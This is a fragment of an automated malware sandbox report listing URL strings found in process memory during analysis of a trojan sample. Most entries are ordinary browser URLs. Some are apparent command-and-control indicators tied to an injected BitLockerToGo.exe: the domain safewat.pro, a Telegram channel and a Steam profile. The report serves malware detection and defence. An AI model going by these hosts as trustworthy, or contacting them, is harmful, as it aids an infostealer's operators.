              Source: chrome.exe, 00000005.00000002.2175469937.00006D8C00528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181798474.00006D8C00F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176565290.00006D8C00788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
              Source: chrome.exe, 00000005.00000002.2176789621.00006D8C007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181828759.00006D8C00F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175378897.00006D8C004D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
              Source: chrome.exe, 00000005.00000002.2181828759.00006D8C00F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacym
              Source: chrome.exe, 00000005.00000002.2176789621.00006D8C007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175865435.00006D8C00660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175378897.00006D8C004D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
              Source: chrome.exe, 00000005.00000003.2126429989.00006D8C0171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126339639.00006D8C01718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126881847.00006D8C01754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126543251.00006D8C01724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126651208.00006D8C01730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126606132.00006D8C01728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126485481.00006D8C01720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126726630.00006D8C01738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126813737.00006D8C0174C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
              Source: chrome.exe, 00000005.00000003.2126881847.00006D8C01754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chromem
              Source: chrome.exe, 00000005.00000002.2176115208.00006D8C00718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C00303000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2179200325.00006D8C00A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102614514.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
              Source: chrome.exe, 00000005.00000003.2120573504.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116538462.00006D8C01414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
              Source: chrome.exe, 00000005.00000003.2121657778.00006D8C002AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2182370700.00006D8C01140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
              Source: chrome.exe, 00000005.00000003.2120573504.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116538462.00006D8C01414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
              Source: chrome.exe, 00000005.00000003.2120573504.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116538462.00006D8C01414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
              Source: chrome.exe, 00000005.00000003.2099001899.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181526306.00006D8C00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2130199587.00006D8C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2129198826.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103743217.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2115274056.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180095771.00006D8C00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121905740.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
              Source: chrome.exe, 00000005.00000002.2181526306.00006D8C00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2130199587.00006D8C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181553572.00006D8C00EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099105217.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
              Source: chrome.exe, 00000005.00000003.2099001899.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2129198826.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103743217.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2115274056.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180095771.00006D8C00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121905740.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
              Source: chrome.exe, 00000005.00000003.2099001899.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181526306.00006D8C00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2130199587.00006D8C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2129198826.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103743217.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2115274056.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180095771.00006D8C00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099105217.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174798561.00006D8C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121905740.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
              Source: chrome.exe, 00000005.00000003.2099001899.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2129198826.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103743217.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2115274056.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180095771.00006D8C00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174798561.00006D8C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121905740.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
              Source: chrome.exe, 00000005.00000003.2099001899.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181526306.00006D8C00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2130199587.00006D8C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2129198826.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103743217.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2115274056.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180095771.00006D8C00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099105217.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121905740.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
              Source: chrome.exe, 00000005.00000002.2181526306.00006D8C00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099105217.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
              Source: chrome.exe, 00000005.00000003.2099001899.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181526306.00006D8C00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181380082.00006D8C00E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2130199587.00006D8C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2129198826.00006D8C00C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103743217.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2115274056.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180095771.00006D8C00C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099105217.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121905740.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181500554.00006D8C00E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C00303000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2179200325.00006D8C00A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102614514.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
              Source: chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
              Source: chromecache_70.7.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chrome.exe, 00000005.00000002.2182189334.00006D8C01054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=truemm
              Source: chromecache_75.7.drString found in binary or memory: https://plus.google.com
              Source: chromecache_75.7.drString found in binary or memory: https://plus.googleapis.com
              Source: chrome.exe, 00000005.00000002.2179200325.00006D8C00A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102614514.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: chrome.exe, 00000005.00000002.2174113799.00006D8C000C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
              Source: BitLockerToGo.exe, 00000004.00000003.1988133219.0000000003342000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2042974221.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro
              Source: BitLockerToGo.exe, 00000004.00000003.2042974221.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro/
              Source: BitLockerToGo.exe, 00000004.00000003.2003064152.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro/5
              Source: BitLockerToGo.exe, 00000004.00000003.2074220791.0000000003392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro/L
              Source: BitLockerToGo.exe, 00000004.00000003.2029593056.0000000003342000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2042974221.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro/j
              Source: BitLockerToGo.exe, 00000004.00000003.2029593056.0000000003342000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2042974221.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro/m
              Source: BitLockerToGo.exe, 00000004.00000003.2016322374.0000000003342000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2003064152.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro/ro
              Source: BitLockerToGo.exe, 00000004.00000003.2029593056.0000000003342000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2016322374.0000000003342000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2042974221.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safewat.pro5
              Source: chrome.exe, 00000005.00000002.2174145696.00006D8C000E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2179079873.00006D8C00A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176912781.00006D8C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176950503.00006D8C0081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2179079873.00006D8C00A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176912781.00006D8C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176950503.00006D8C0081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
              Source: chrome.exe, 00000005.00000002.2175203811.00006D8C00454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199824159981
              Source: BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199824159981a110mgzMozilla/5.0
              Source: BitLockerToGo.exe, 00000004.00000002.2694047242.00000000062BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000004.00000002.2694047242.00000000062BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000004.00000003.2166051731.0000000005916000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.0000000005936000.00000004.00000020.00020000.00000000.sdmp, 2n7900.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: BitLockerToGo.exe, 00000004.00000002.2691298161.0000000005912000.00000004.00000020.00020000.00000000.sdmp, 2n7900.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: BitLockerToGo.exe, 00000004.00000003.2166051731.0000000005916000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.0000000005936000.00000004.00000020.00020000.00000000.sdmp, 2n7900.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: BitLockerToGo.exe, 00000004.00000002.2691298161.0000000005912000.00000004.00000020.00020000.00000000.sdmp, 2n7900.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.0000000003316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
              Source: BitLockerToGo.exe, 00000004.00000003.1988133219.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/sok33tn
              Source: BitLockerToGo.exe, 00000004.00000003.1988133219.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/sok33tn)6
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.0000000003316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/sok33tnZm
              Source: BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/sok33tna110mgzMozilla/5.0
              Source: chrome.exe, 00000005.00000002.2179048738.00006D8C00A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1988133219.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: chromecache_75.7.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp, aaaieu.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp, aaaieu.4.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: chrome.exe, 00000005.00000002.2182274506.00006D8C010FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: chrome.exe, 00000005.00000003.2098861035.00006D8C00D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: chrome.exe, 00000005.00000002.2177154545.00006D8C00844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2179390865.00006D8C00AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
              Source: chrome.exe, 00000005.00000002.2180354436.00006D8C00CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
              Source: chrome.exe, 00000005.00000002.2182402534.00006D8C0115C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
              Source: chrome.exe, 00000005.00000002.2181268800.00006D8C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2177400994.00006D8C008A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2178342213.00006D8C0099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
              Source: chrome.exe, 00000005.00000002.2181268800.00006D8C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2177400994.00006D8C008A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2178342213.00006D8C0099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
              Source: chrome.exe, 00000005.00000002.2174989074.00006D8C00338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176565290.00006D8C00788000.00000004.00000800.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chrome.exe, 00000005.00000002.2175203811.00006D8C00454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
              Source: chrome.exe, 00000005.00000002.2175203811.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116538462.00006D8C01414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
              Source: chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
